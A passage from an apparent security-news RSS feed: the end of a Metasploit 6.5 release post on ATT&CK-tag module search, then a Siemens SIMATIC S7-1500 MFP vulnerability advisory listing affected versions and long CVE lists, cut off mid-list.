href="https://github.com/rapid7/metasploit-framework/blob/master/plugins/fzuse.rb">fzf plugin</a>. One thing users often need to do however is emulate real world threat actors. A substantial amount of threat intelligence <a href="https://www.rapid7.com/blog/post/tr-malware-tracking-dropping-elephant-tradecraft-china-themed-loader-chain/#:~:text=the%20lineage%20assessment.-,Mitigation%20guidance,-MITRE%20ATT%26CK">provides these</a> techniques while documenting the attack chains. Metasploit has begun tagging our own modules with ATT&amp;CK tags to enable users to easily find modules that leverage a particular technique. To search for a module, use the <span data-type="inlineCode">att&amp;ck</span> search modifier. For example to find all modules that leverage <a href="https://attack.mitre.org/techniques/T1059/001/">T1059.001 (Command and Scripting Interpreter: PowerShell)</a> use <span data-type="inlineCode">att&amp;ck:T1059.001</span>. The hierarchy is also honored, so to search more broadly for <a href="https://attack.mitre.org/techniques/T1059/">T1059 (Command and Scripting Interpreter)</a> use <span data-type="inlineCode">att&amp;ck:T1059</span> and additional modules such as exploit/windows/mysql/mysql_mof will be included in the search results.</p><h2>Conclusion</h2><p>Metasploit 6.5 represents an evolution in the framework, delivering a wide array of new capabilities designed to improve both usability and the realism of modern security testing. From the highly requested integration of Malleable C2 profiles and our new Metasploit MCP Server to advanced NTLM relaying, enhanced fetch payload utilities, and the introduction of MITRE ATT&amp;CK tagging, this release is built to support increasingly complex and automated workflows. We look forward to seeing how these tools help our community continue to push the boundaries of vulnerability validation and threat emulation. Thank you to all the contributors who helped make this release possible.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Siemens SIMATIC S7-1500 CPU 1518(F)-4 PN/DP MFP]]></title>
<description><![CDATA[View CSAF
Summary
Multiple vulnerabilities have been identified in the additional GNU/Linux subsystem of the firmware version V3.1.6 for the SIMATIC S7-1500 CPU 1518(F)-4 PN/DP MFP (incl. SIPLUS variant). Siemens is preparing fix versions and recommends specific countermeasures for products where...]]></description>
<link>https://tsecurity.de/de/3697611/it-security-nachrichten/siemens-simatic-s7-1500-cpu-1518f-4-pndp-mfp/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3697611/it-security-nachrichten/siemens-simatic-s7-1500-cpu-1518f-4-pndp-mfp/</guid>
<pubDate>Mon, 03 Aug 2026 00:06:09 +0200</pubDate>
<content:encoded><![CDATA[<p><a href="https://github.com/cisagov/CSAF/blob/develop/csaf_files/OT/white/2026/icsa-26-209-04.json"><strong>View CSAF</strong></a></p>
<h2>Summary</h2>
<p><strong>Multiple vulnerabilities have been identified in the additional GNU/Linux subsystem of the firmware version V3.1.6 for the SIMATIC S7-1500 CPU 1518(F)-4 PN/DP MFP (incl. SIPLUS variant). Siemens is preparing fix versions and recommends specific countermeasures for products where fixes are not, or not yet available.</strong></p>
<p>The following versions of Siemens SIMATIC S7-1500 CPU 1518(F)-4 PN/DP MFP are affected:</p>
<ul>
<li>SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AB0) vers:intdot/&gt;=3.1.6 (CVE-2021-41617, CVE-2023-28531, CVE-2023-51384, CVE-2023-52927, CVE-2024-26783, CVE-2024-27056, CVE-2024-28956, CVE-2024-36903, CVE-2024-36927, CVE-2024-42079, CVE-2024-46786, CVE-2024-47736, CVE-2024-47809, CVE-2024-49968, CVE-2024-49994, CVE-2024-49998, CVE-2024-50014, CVE-2024-50063, CVE-2024-50164, CVE-2024-50298, CVE-2024-53124, CVE-2024-53170, CVE-2024-54458, CVE-2024-56631, CVE-2024-56703, CVE-2024-56719, CVE-2024-57917, CVE-2024-57924, CVE-2024-57973, CVE-2024-57977, CVE-2024-57979, CVE-2024-58011, CVE-2024-58016, CVE-2024-58020, CVE-2024-58056, CVE-2024-58058, CVE-2024-58061, CVE-2024-58086, CVE-2025-21645, CVE-2025-21648, CVE-2025-21655, CVE-2025-21676, CVE-2025-21682, CVE-2025-21702, CVE-2025-21705, CVE-2025-21706, CVE-2025-21707, CVE-2025-21718, CVE-2025-21731, CVE-2025-21745, CVE-2025-21758, CVE-2025-21760, CVE-2025-21764, CVE-2025-21765, CVE-2025-21780, CVE-2025-21795, CVE-2025-21796, CVE-2025-21802, CVE-2025-21814, CVE-2025-21846, CVE-2025-21853, CVE-2025-21861, CVE-2025-21864, CVE-2025-21867, CVE-2025-21875, CVE-2025-21887, CVE-2025-21913, CVE-2025-21919, CVE-2025-21925, CVE-2025-21926, CVE-2025-21938, CVE-2025-21959, CVE-2025-21999, CVE-2025-22005, CVE-2025-22015, CVE-2025-22055, CVE-2025-22056, CVE-2025-22060, CVE-2025-22083, CVE-2025-22090, CVE-2025-22095, CVE-2025-22107, CVE-2025-22111, CVE-2025-22121, CVE-2025-23136, CVE-2025-23143, CVE-2025-37785, CVE-2025-37909, CVE-2025-37917, CVE-2025-37945, CVE-2025-37959, CVE-2025-37964, CVE-2025-37972, CVE-2025-37980, CVE-2025-38125, CVE-2025-38162, CVE-2025-38192, CVE-2025-38201, CVE-2025-38232, CVE-2025-38322, CVE-2025-38591, CVE-2025-38614, CVE-2025-38681, CVE-2025-38704, CVE-2025-38721, CVE-2025-38725, CVE-2025-38727, CVE-2025-38732, CVE-2025-38736, CVE-2025-39681, CVE-2025-39691, CVE-2025-39721, CVE-2025-39748, CVE-2025-39756, CVE-2025-39764, CVE-2025-39770, CVE-2025-39773, CVE-2025-39782, CVE-2025-39795, CVE-2025-39826, CVE-2025-39827, CVE-2025-39845, CVE-2025-39866, CVE-2025-39871, CVE-2025-39931, CVE-2025-39953, CVE-2025-39955, CVE-2025-39964, CVE-2025-39977, CVE-2025-39978, CVE-2025-39980, CVE-2025-40022, CVE-2025-40070, CVE-2025-40078, CVE-2025-40080, CVE-2025-40105, CVE-2025-40135, CVE-2025-40149, CVE-2025-40219, CVE-2025-40261, CVE-2025-40300, CVE-2025-61984, CVE-2025-61985, CVE-2025-68206, CVE-2025-68261, CVE-2025-68264, CVE-2025-68265, CVE-2025-68266, CVE-2025-68291, CVE-2025-68337, CVE-2025-68349, CVE-2025-68363, CVE-2025-68371, CVE-2025-68724, CVE-2025-68725, CVE-2025-68742, CVE-2025-68764, CVE-2025-68773, CVE-2025-68776, CVE-2025-68782, CVE-2025-68787, CVE-2025-68788, CVE-2025-68798, CVE-2025-68803, CVE-2025-68814, CVE-2025-68816, CVE-2025-68818, CVE-2025-68820, CVE-2025-71064, CVE-2025-71075, CVE-2025-71079, CVE-2025-71085, CVE-2025-71086, CVE-2025-71088, CVE-2025-71095, CVE-2025-71097, CVE-2025-71098, CVE-2025-71104, CVE-2025-71112, CVE-2025-71113, CVE-2025-71114, CVE-2025-71120, CVE-2025-71123, CVE-2025-71131, CVE-2025-71161, CVE-2025-71162, CVE-2025-71163, CVE-2025-71185, CVE-2025-71186, CVE-2025-71189, CVE-2025-71190, CVE-2025-71191, CVE-2025-71197, CVE-2025-71221, CVE-2025-71265, CVE-2025-71266, CVE-2025-71267, CVE-2026-3497, CVE-2026-22977, CVE-2026-22979, CVE-2026-22980, CVE-2026-22982, CVE-2026-22992, CVE-2026-22994, CVE-2026-23003, CVE-2026-23005, CVE-2026-23010, CVE-2026-23011, CVE-2026-23019, CVE-2026-23026, CVE-2026-23038, CVE-2026-23054, CVE-2026-23060, CVE-2026-23083, CVE-2026-23084, CVE-2026-23086, CVE-2026-23087, CVE-2026-23095, CVE-2026-23100, CVE-2026-23103, CVE-2026-23110, CVE-2026-23111, CVE-2026-23113, CVE-2026-23154, CVE-2026-23204, CVE-2026-23231, CVE-2026-23242, CVE-2026-23243, CVE-2026-23245, CVE-2026-23270, CVE-2026-23271, CVE-2026-23273, CVE-2026-23274, CVE-2026-23277, CVE-2026-23284, CVE-2026-23287, CVE-2026-23290, CVE-2026-23293, CVE-2026-23300, CVE-2026-23304, CVE-2026-23319, CVE-2026-23321, CVE-2026-23335, CVE-2026-23340, CVE-2026-23343, CVE-2026-23351, CVE-2026-23359, CVE-2026-23365, CVE-2026-23368, CVE-2026-23370, CVE-2026-23378, CVE-2026-23379, CVE-2026-23381, CVE-2026-23391, CVE-2026-23392, CVE-2026-23397, CVE-2026-23398, CVE-2026-23414, CVE-2026-23422, CVE-2026-23434, CVE-2026-23438, CVE-2026-23439, CVE-2026-23446, CVE-2026-23449, CVE-2026-23450, CVE-2026-23452, CVE-2026-23454, CVE-2026-23455, CVE-2026-23456, CVE-2026-23457, CVE-2026-23458, CVE-2026-23463, CVE-2026-23474, CVE-2026-23475, CVE-2026-27135, CVE-2026-31389, CVE-2026-31391, CVE-2026-31396, CVE-2026-31402, CVE-2026-31403, CVE-2026-31411, CVE-2026-31414, CVE-2026-31415, CVE-2026-31416, CVE-2026-31417, CVE-2026-31418, CVE-2026-31421, CVE-2026-31422, CVE-2026-31423, CVE-2026-31424, CVE-2026-31427, CVE-2026-31428, CVE-2026-31431, CVE-2026-31441, CVE-2026-31446, CVE-2026-31447, CVE-2026-31448, CVE-2026-31450, CVE-2026-31452, CVE-2026-31466, CVE-2026-31469, CVE-2026-31485, CVE-2026-31494, CVE-2026-31495, CVE-2026-31496, CVE-2026-31503, CVE-2026-31504, CVE-2026-31507, CVE-2026-31508, CVE-2026-31515, CVE-2026-31518, CVE-2026-31521, CVE-2026-31533, CVE-2026-31546, CVE-2026-31555, CVE-2026-31563, CVE-2026-31565, CVE-2026-31628, CVE-2026-31634, CVE-2026-31649, CVE-2026-31651, CVE-2026-31658, CVE-2026-31664, CVE-2026-31665, CVE-2026-31669, CVE-2026-31670, CVE-2026-31671, CVE-2026-31674, CVE-2026-31680, CVE-2026-31682, CVE-2026-31737, CVE-2026-31752, CVE-2026-31761, CVE-2026-31768, CVE-2026-40355, CVE-2026-41989, CVE-2026-43011, CVE-2026-43024, CVE-2026-43025, CVE-2026-43026, CVE-2026-43027, CVE-2026-43028, CVE-2026-43030, CVE-2026-43033, CVE-2026-43035, CVE-2026-43038, CVE-2026-43040, CVE-2026-43057, CVE-2026-43284, CVE-2026-46174, CVE-2026-46300, CVE-2026-46333)</li>
<li>SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AC0) vers:intdot/&gt;=3.1.6 (CVE-2021-41617, CVE-2023-28531, CVE-2023-51384, CVE-2023-52927, CVE-2024-26783, CVE-2024-27056, CVE-2024-28956, CVE-2024-36903, CVE-2024-36927, CVE-2024-42079, CVE-2024-46786, CVE-2024-47736, CVE-2024-47809, CVE-2024-49968, CVE-2024-49994, CVE-2024-49998, CVE-2024-50014, CVE-2024-50063, CVE-2024-50164, CVE-2024-50298, CVE-2024-53124, CVE-2024-53170, CVE-2024-54458, CVE-2024-56631, CVE-2024-56703, CVE-2024-56719, CVE-2024-57917, CVE-2024-57924, CVE-2024-57973, CVE-2024-57977, CVE-2024-57979, CVE-2024-58011, CVE-2024-58016, CVE-2024-58020, CVE-2024-58056, CVE-2024-58058, CVE-2024-58061, CVE-2024-58086, CVE-2025-21645, CVE-2025-21648, CVE-2025-21655, CVE-2025-21676, CVE-2025-21682, CVE-2025-21702, CVE-2025-21705, CVE-2025-21706, CVE-2025-21707, CVE-2025-21718, CVE-2025-21731, CVE-2025-21745, CVE-2025-21758, CVE-2025-21760, CVE-2025-21764, CVE-2025-21765, CVE-2025-21780, CVE-2025-21795, CVE-2025-21796, CVE-2025-21802, CVE-2025-21814, CVE-2025-21846, CVE-2025-21853, CVE-2025-21861, CVE-2025-21864, CVE-2025-21867, CVE-2025-21875, CVE-2025-21887, CVE-2025-21913, CVE-2025-21919, CVE-2025-21925, CVE-2025-21926, CVE-2025-21938, CVE-2025-21959, CVE-2025-21999, CVE-2025-22005, CVE-2025-22015, CVE-2025-22055, CVE-2025-22056, CVE-2025-22060, CVE-2025-22083, CVE-2025-22090, CVE-2025-22095, CVE-2025-22107, CVE-2025-22111, CVE-2025-22121, CVE-2025-23136, CVE-2025-23143, CVE-2025-37785, CVE-2025-37909, CVE-2025-37917, CVE-2025-37945, CVE-2025-37959, CVE-2025-37964, CVE-2025-37972, CVE-2025-37980, CVE-2025-38125, CVE-2025-38162, CVE-2025-38192, CVE-2025-38201, CVE-2025-38232, CVE-2025-38322, CVE-2025-38591, CVE-2025-38614, CVE-2025-38681, CVE-2025-38704, CVE-2025-38721, CVE-2025-38725, CVE-2025-38727, CVE-2025-38732, CVE-2025-38736, CVE-2025-39681, CVE-2025-39691, CVE-2025-39721, CVE-2025-39748, CVE-2025-39756, CVE-2025-39764, CVE-2025-39770, CVE-2025-39773, CVE-2025-39782, CVE-2025-39795, CVE-2025-39826, CVE-2025-39827, CVE-2025-39845, CVE-2025-39866, CVE-2025-39871, CVE-2025-39931, CVE-2025-39953, CVE-2025-39955, CVE-2025-39964, CVE-2025-39977, CVE-2025-39978, CVE-2025-39980, CVE-2025-40022, CVE-2025-40070, CVE-2025-40078, CVE-2025-40080, CVE-2025-40105, CVE-2025-40135, CVE-2025-40149, CVE-2025-40219, CVE-2025-40261, CVE-2025-40300, CVE-2025-61984, CVE-2025-61985, CVE-2025-68206, CVE-2025-68261, CVE-2025-68264, CVE-2025-68265, CVE-2025-68266, CVE-2025-68291, CVE-2025-68337, CVE-2025-68349, CVE-2025-68363, CVE-2025-68371, CVE-2025-68724, CVE-2025-68725, CVE-2025-68742, CVE-2025-68764, CVE-2025-68773, CVE-2025-68776, CVE-2025-68782, CVE-2025-68787, CVE-2025-68788, CVE-2025-68798, CVE-2025-68803, CVE-2025-68814, CVE-2025-68816, CVE-2025-68818, CVE-2025-68820, CVE-2025-71064, CVE-2025-71075, CVE-2025-71079, CVE-2025-71085, CVE-2025-71086, CVE-2025-71088, CVE-2025-71095, CVE-2025-71097, CVE-2025-71098, CVE-2025-71104, CVE-2025-71112, CVE-2025-71113, CVE-2025-71114, CVE-2025-71120, CVE-2025-71123, CVE-2025-71131, CVE-2025-71161, CVE-2025-71162, CVE-2025-71163, CVE-2025-71185, CVE-2025-71186, CVE-2025-71189, CVE-2025-71190, CVE-2025-71191, CVE-2025-71197, CVE-2025-71221, CVE-2025-71265, CVE-2025-71266, CVE-2025-71267, CVE-2026-3497, CVE-2026-22977, CVE-2026-22979, CVE-2026-22980, CVE-2026-22982, CVE-2026-22992, CVE-2026-22994, CVE-2026-23003, CVE-2026-23005, CVE-2026-23010, CVE-2026-23011, CVE-2026-23019, CVE-2026-23026, CVE-2026-23038, CVE-2026-23054, CVE-2026-23060, CVE-2026-23083, CVE-2026-23084, CVE-2026-23086, CVE-2026-23087, CVE-2026-23095, CVE-2026-23100, CVE-2026-23103, CVE-2026-23110, CVE-2026-23111, CVE-2026-23113, CVE-2026-23154, CVE-2026-23204, CVE-2026-23231, CVE-2026-23242, CVE-2026-23243, CVE-2026-23245, CVE-2026-23270, CVE-2026-23271, CVE-2026-23273, CVE-2026-23274, CVE-2026-23277, CVE-2026-23284, CVE-2026-23287, CVE-2026-23290, CVE-2026-23293, CVE-2026-23300, CVE-2026-23304, CVE-2026-23319, CVE-2026-23321, CVE-2026-23335, CVE-2026-23340, CVE-2026-23343, CVE-2026-23351, CVE-2026-23359, CVE-2026-23365, CVE-2026-23368, CVE-2026-23370, CVE-2026-23378, CVE-2026-23379, CVE-2026-23381, CVE-2026-23391, CVE-2026-23392, CVE-2026-23397, CVE-2026-23398, CVE-2026-23414, CVE-2026-23422, CVE-2026-23434, CVE-2026-23438, CVE-2026-23439, CVE-2026-23446, CVE-2026-23449, CVE-2026-23450, CVE-2026-23452, CVE-2026-23454, CVE-2026-23455, CVE-2026-23456, CVE-2026-23457, CVE-2026-23458, CVE-2026-23463, CVE-2026-23474, CVE-2026-23475, CVE-2026-27135, CVE-2026-31389, CVE-2026-31391, CVE-2026-31396, CVE-2026-31402, CVE-2026-31403, CVE-2026-31411, CVE-2026-31414, CVE-2026-31415, CVE-2026-31416, CVE-2026-31417, CVE-2026-31418, CVE-2026-31421, CVE-2026-31422, CVE-2026-31423, CVE-2026-31424, CVE-2026-31427, CVE-2026-31428, CVE-2026-31431, CVE-2026-31441, CVE-2026-31446, CVE-2026-31447, CVE-2026-31448, CVE-2026-31450, CVE-2026-31452, CVE-2026-31466, CVE-2026-31469, CVE-2026-31485, CVE-2026-31494, CVE-2026-31495, CVE-2026-31496, CVE-2026-31503, CVE-2026-31504, CVE-2026-31507, CVE-2026-31508, CVE-2026-31515, CVE-2026-31518, CVE-2026-31521, CVE-2026-31533, CVE-2026-31546, CVE-2026-31555, CVE-2026-31563, CVE-2026-31565, CVE-2026-31628, CVE-2026-31634, CVE-2026-31649, CVE-2026-31651, CVE-2026-31658, CVE-2026-31664, CVE-2026-31665, CVE-2026-31669, CVE-2026-31670, CVE-2026-31671, CVE-2026-31674, CVE-2026-31680, CVE-2026-31682, CVE-2026-31737, CVE-2026-31752, CVE-2026-31761, CVE-2026-31768, CVE-2026-40355, CVE-2026-41989, CVE-2026-43011, CVE-2026-43024, CVE-2026-43025, CVE-2026-43026, CVE-2026-43027, CVE-2026-43028, CVE-2026-43030, CVE-2026-43033, CVE-2026-43035, CVE-2026-43038, CVE-2026-43040, CVE-2026-43057, CVE-2026-43284, CVE-2026-46174, CVE-2026-46300, CVE-2026-46333)</li>
<li>SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AB0) vers:intdot/&gt;=3.1.6 (CVE-2021-41617, CVE-2023-28531, CVE-2023-51384, CVE-2023-52927, CVE-2024-26783, CVE-2024-27056, CVE-2024-28956, CVE-2024-36903, CVE-2024-36927, CVE-2024-42079, CVE-2024-46786, CVE-2024-47736, CVE-2024-47809, CVE-2024-49968, CVE-2024-49994, CVE-2024-49998, CVE-2024-50014, CVE-2024-50063, CVE-2024-50164, CVE-2024-50298, CVE-2024-53124, CVE-2024-53170, CVE-2024-54458, CVE-2024-56631, CVE-2024-56703, CVE-2024-56719, CVE-2024-57917, CVE-2024-57924, CVE-2024-57973, CVE-2024-57977, CVE-2024-57979, CVE-2024-58011, CVE-2024-58016, CVE-2024-58020, CVE-2024-58056, CVE-2024-58058, CVE-2024-58061, CVE-2024-58086, CVE-2025-21645, CVE-2025-21648, CVE-2025-21655, CVE-2025-21676, CVE-2025-21682, CVE-2025-21702, CVE-2025-21705, CVE-2025-21706, CVE-2025-21707, CVE-2025-21718, CVE-2025-21731, CVE-2025-21745, CVE-2025-21758, CVE-2025-21760, CVE-2025-21764, CVE-2025-21765, CVE-2025-21780, CVE-2025-21795, CVE-2025-21796, CVE-2025-21802, CVE-2025-21814, CVE-2025-21846, CVE-2025-21853, CVE-2025-21861, CVE-2025-21864, CVE-2025-21867, CVE-2025-21875, CVE-2025-21887, CVE-2025-21913, CVE-2025-21919, CVE-2025-21925, CVE-2025-21926, CVE-2025-21938, CVE-2025-21959, CVE-2025-21999, CVE-2025-22005, CVE-2025-22015, CVE-2025-22055, CVE-2025-22056, CVE-2025-22060, CVE-2025-22083, CVE-2025-22090, CVE-2025-22095, CVE-2025-22107, CVE-2025-22111, CVE-2025-22121, CVE-2025-23136, CVE-2025-23143, CVE-2025-37785, CVE-2025-37909, CVE-2025-37917, CVE-2025-37945, CVE-2025-37959, CVE-2025-37964, CVE-2025-37972, CVE-2025-37980, CVE-2025-38125, CVE-2025-38162, CVE-2025-38192, CVE-2025-38201, CVE-2025-38232, CVE-2025-38322, CVE-2025-38591, CVE-2025-38614, CVE-2025-38681, CVE-2025-38704, CVE-2025-38721, CVE-2025-38725, CVE-2025-38727, CVE-2025-38732, CVE-2025-38736, CVE-2025-39681, CVE-2025-39691, CVE-2025-39721, CVE-2025-39748, CVE-2025-39756, CVE-2025-39764, CVE-2025-39770, CVE-2025-39773, CVE-2025-39782, CVE-2025-39795, CVE-2025-39826, CVE-2025-39827, CVE-2025-39845, CVE-2025-39866, CVE-2025-39871, CVE-2025-39931, CVE-2025-39953, CVE-2025-39955, CVE-2025-39964, CVE-2025-39977, CVE-2025-39978, CVE-2025-39980, CVE-2025-40022, CVE-2025-40070, CVE-2025-40078, CVE-2025-40080, CVE-2025-40105, CVE-2025-40135, CVE-2025-40149, CVE-2025-40219, CVE-2025-40261, CVE-2025-40300, CVE-2025-61984, CVE-2025-61985, CVE-2025-68206, CVE-2025-68261, CVE-2025-68264, CVE-2025-68265, CVE-2025-68266, CVE-2025-68291, CVE-2025-68337, CVE-2025-68349, CVE-2025-68363, CVE-2025-68371, CVE-2025-68724, CVE-2025-68725, CVE-2025-68742, CVE-2025-68764, CVE-2025-68773, CVE-2025-68776, CVE-2025-68782, CVE-2025-68787, CVE-2025-68788, CVE-2025-68798, CVE-2025-68803, CVE-2025-68814, CVE-2025-68816, CVE-2025-68818, CVE-2025-68820, CVE-2025-71064, CVE-2025-71075, CVE-2025-71079, CVE-2025-71085, CVE-2025-71086, CVE-2025-71088, CVE-2025-71095, CVE-2025-71097, CVE-2025-71098, CVE-2025-71104, CVE-2025-71112, CVE-2025-71113, CVE-2025-71114, CVE-2025-71120, CVE-2025-71123, CVE-2025-71131, CVE-2025-71161, CVE-2025-71162, CVE-2025-71163, CVE-2025-71185, CVE-2025-71186, CVE-2025-71189, CVE-2025-71190, CVE-2025-71191, CVE-2025-71197, CVE-2025-71221, CVE-2025-71265, CVE-2025-71266, CVE-2025-71267, CVE-2026-3497, CVE-2026-22977, CVE-2026-22979, CVE-2026-22980, CVE-2026-22982, CVE-2026-22992, CVE-2026-22994, CVE-2026-23003, CVE-2026-23005, CVE-2026-23010, CVE-2026-23011, CVE-2026-23019, CVE-2026-23026, CVE-2026-23038, CVE-2026-23054, CVE-2026-23060, CVE-2026-23083, CVE-2026-23084, CVE-2026-23086, CVE-2026-23087, CVE-2026-23095, CVE-2026-23100, CVE-2026-23103, CVE-2026-23110, CVE-2026-23111, CVE-2026-23113, CVE-2026-23154, CVE-2026-23204, CVE-2026-23231, CVE-2026-23242, CVE-2026-23243, CVE-2026-23245, CVE-2026-23270, CVE-2026-23271, CVE-2026-23273, CVE-2026-23274, CVE-2026-23277, CVE-2026-23284, CVE-2026-23287, CVE-2026-23290, CVE-2026-23293, CVE-2026-23300, CVE-2026-23304, CVE-2026-23319, CVE-2026-23321, CVE-2026-23335, CVE-2026-23340, CVE-2026-23343, CVE-2026-23351, CVE-2026-23359, CVE-2026-23365, CVE-2026-23368, CVE-2026-23370, CVE-2026-23378, CVE-2026-23379, CVE-2026-23381, CVE-2026-23391, CVE-2026-23392, CVE-2026-23397, CVE-2026-23398, CVE-2026-23414, CVE-2026-23422, CVE-2026-23434, CVE-2026-23438, CVE-2026-23439, CVE-2026-23446, CVE-2026-23449, CVE-2026-23450, CVE-2026-23452, CVE-2026-23454, CVE-2026-23455, CVE-2026-23456, CVE-2026-23457, CVE-2026-23458, CVE-2026-23463, CVE-2026-23474, CVE-2026-23475, CVE-2026-27135, CVE-2026-31389, CVE-2026-31391, CVE-2026-31396, CVE-2026-31402, CVE-2026-31403, CVE-2026-31411, CVE-2026-31414, CVE-2026-31415, CVE-2026-31416, CVE-2026-31417, CVE-2026-31418, CVE-2026-31421, CVE-2026-31422, CVE-2026-31423, CVE-2026-31424, CVE-2026-31427, CVE-2026-31428, CVE-2026-31431, CVE-2026-31441, CVE-2026-31446, CVE-2026-31447, CVE-2026-31448, CVE-2026-31450, CVE-2026-31452, CVE-2026-31466, CVE-2026-31469, CVE-2026-31485, CVE-2026-31494, CVE-2026-31495, CVE-2026-31496, CVE-2026-31503, CVE-2026-31504, CVE-2026-31507, CVE-2026-31508, CVE-2026-31515, CVE-2026-31518, CVE-2026-31521, CVE-2026-31533, CVE-2026-31546, CVE-2026-31555, CVE-2026-31563, CVE-2026-31565, CVE-2026-31628, CVE-2026-31634, CVE-2026-31649, CVE-2026-31651, CVE-2026-31658, CVE-2026-31664, CVE-2026-31665, CVE-2026-31669, CVE-2026-31670, CVE-2026-31671, CVE-2026-31674, CVE-2026-31680, CVE-2026-31682, CVE-2026-31737, CVE-2026-31752, CVE-2026-31761, CVE-2026-31768, CVE-2026-40355, CVE-2026-41989, CVE-2026-43011, CVE-2026-43024, CVE-2026-43025, CVE-2026-43026, CVE-2026-43027, CVE-2026-43028, CVE-2026-43030, CVE-2026-43033, CVE-2026-43035, CVE-2026-43038, CVE-2026-43040, CVE-2026-43057, CVE-2026-43284, CVE-2026-46174, CVE-2026-46300, CVE-2026-46333)</li>
<li>SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AC0) vers:intdot/&gt;=3.1.6 (CVE-2021-41617, CVE-2023-28531, CVE-2023-51384, CVE-2023-52927, CVE-2024-26783, CVE-2024-27056, CVE-2024-28956, CVE-2024-36903, CVE-2024-36927, CVE-2024-42079, CVE-2024-46786, CVE-2024-47736, CVE-2024-47809, CVE-2024-49968, CVE-2024-49994, CVE-2024-49998, CVE-2024-50014, CVE-2024-50063, CVE-2024-50164, CVE-2024-50298, CVE-2024-53124, CVE-2024-53170, CVE-2024-54458, CVE-2024-56631, CVE-2024-56703, CVE-2024-56719, CVE-2024-57917, CVE-2024-57924, CVE-2024-57973, CVE-2024-57977, CVE-2024-57979, CVE-2024-58011, CVE-2024-58016, CVE-2024-58020, CVE-2024-58056, CVE-2024-58058, CVE-2024-58061, CVE-2024-58086, CVE-2025-21645, CVE-2025-21648, CVE-2025-21655, CVE-2025-21676, CVE-2025-21682, CVE-2025-21702, CVE-2025-21705, CVE-2025-21706, CVE-2025-21707, CVE-2025-21718, CVE-2025-21731, CVE-2025-21745, CVE-2025-21758, CVE-2025-21760, CVE-2025-21764, CVE-2025-21765, CVE-2025-21780, CVE-2025-21795, CVE-2025-21796, CVE-2025-21802, CVE-2025-21814, CVE-2025-21846, CVE-2025-21853, CVE-2025-21861, CVE-2025-21864, CVE-2025-21867, CVE-2025-21875, CVE-2025-21887, CVE-2025-21913, CVE-2025-21919, CVE-2025-21925, CVE-2025-21926, CVE-2025-21938, CVE-2025-21959, CVE-2025-21999, CVE-2025-22005, CVE-2025-22015, CVE-2025-22055, CVE-2025-22056, CVE-2025-22060, CVE-2025-22083, CVE-2025-22090, CVE-2025-22095, CVE-2025-22107, CVE-2025-22111, CVE-2025-22121, CVE-2025-23136, CVE-2025-23143, CVE-2025-37785, CVE-2025-37909, CVE-2025-37917, CVE-2025-37945, CVE-2025-37959, CVE-2025-37964, CVE-2025-37972, CVE-2025-37980, CVE-2025-38125, CVE-2025-38162, CVE-2025-38192, CVE-2025-38201, CVE-2025-38232, CVE-2025-38322, CVE-2025-38591, CVE-2025-38614, CVE-2025-38681, CVE-2025-38704, CVE-2025-38721, CVE-2025-38725, CVE-2025-38727, CVE-2025-38732, CVE-2025-38736, CVE-2025-39681, CVE-2025-39691, CVE-2025-39721, CVE-2025-39748, CVE-2025-39756, CVE-2025-39764, CVE-2025-39770, CVE-2025-39773, CVE-2025-39782, CVE-2025-39795, CVE-2025-39826, CVE-2025-39827, CVE-2025-39845, CVE-2025-39866, CVE-2025-39871, CVE-2025-39931, CVE-2025-39953, CVE-2025-39955, CVE-2025-39964, CVE-2025-39977, CVE-2025-39978, CVE-2025-39980, CVE-2025-40022, CVE-2025-40070, CVE-2025-40078, CVE-2025-40080, CVE-2025-40105, CVE-2025-40135, CVE-2025-40149, CVE-2025-40219, CVE-2025-40261, CVE-2025-40300, CVE-2025-61984, CVE-2025-61985, CVE-2025-68206, CVE-2025-68261, CVE-2025-68264, CVE-2025-68265, CVE-2025-68266, CVE-2025-68291, CVE-2025-68337, CVE-2025-68349, CVE-2025-68363, CVE-2025-68371, CVE-2025-68724, CVE-2025-68725, CVE-2025-68742, CVE-2025-68764, CVE-2025-68773, CVE-2025-68776, CVE-2025-68782, CVE-2025-68787, CVE-2025-68788, CVE-2025-68798, CVE-2025-68803, CVE-2025-68814, CVE-2025-68816, CVE-2025-68818, CVE-2025-68820, CVE-2025-71064, CVE-2025-71075, CVE-2025-71079, CVE-2025-71085, CVE-2025-71086, CVE-2025-71088, CVE-2025-71095, CVE-2025-71097, CVE-2025-71098, CVE-2025-71104, CVE-2025-71112, CVE-2025-71113, CVE-2025-71114, CVE-2025-71120, CVE-2025-71123, CVE-2025-71131, CVE-2025-71161, CVE-2025-71162, CVE-2025-71163, CVE-2025-71185, CVE-2025-71186, CVE-2025-71189, CVE-2025-71190, CVE-2025-71191, CVE-2025-71197, CVE-2025-71221, CVE-2025-71265, CVE-2025-71266, CVE-2025-71267, CVE-2026-3497, CVE-2026-22977, CVE-2026-22979, CVE-2026-22980, CVE-2026-22982, CVE-2026-22992, CVE-2026-22994, CVE-2026-23003, CVE-2026-23005, CVE-2026-23010, CVE-2026-23011, CVE-2026-23019, CVE-2026-23026, CVE-2026-23038, CVE-2026-23054, CVE-2026-23060, CVE-2026-23083, CVE-2026-23084, CVE-2026-23086, CVE-2026-23087, CVE-2026-23095, CVE-2026-23100, CVE-2026-23103, CVE-2026-23110, CVE-2026-23111, CVE-2026-23113, CVE-2026-23154, CVE-2026-23204, CVE-2026-23231, CVE-2026-23242, CVE-2026-23243, CVE-2026-23245, CVE-2026-23270, CVE-2026-23271, CVE-2026-23273, CVE-2026-23274, CVE-2026-23277, CVE-2026-23284, CVE-2026-23287, CVE-2026-23290, CVE-2026-23293, CVE-2026-23300, CVE-2026-23304, CVE-2026-23319, CVE-2026-23321, CVE-2026-23335, CVE-2026-23340, CVE-2026-23343, CVE-2026-23351, CVE-2026-23359, CVE-2026-23365, CVE-2026-23368, CVE-2026-23370, CVE-2026-23378, CVE-2026-23379, CVE-2026-23381, CVE-2026-23391, CVE-2026-23392, CVE-2026-23397, CVE-2026-23398, CVE-2026-23414, CVE-2026-23422, CVE-2026-23434, CVE-2026-23438, CVE-2026-23439, CVE-2026-23446, CVE-2026-23449, CVE-2026-23450, CVE-2026-23452, CVE-2026-23454, CVE-2026-23455, CVE-2026-23456, CVE-2026-23457, CVE-2026-23458, CVE-2026-23463, CVE-2026-23474, 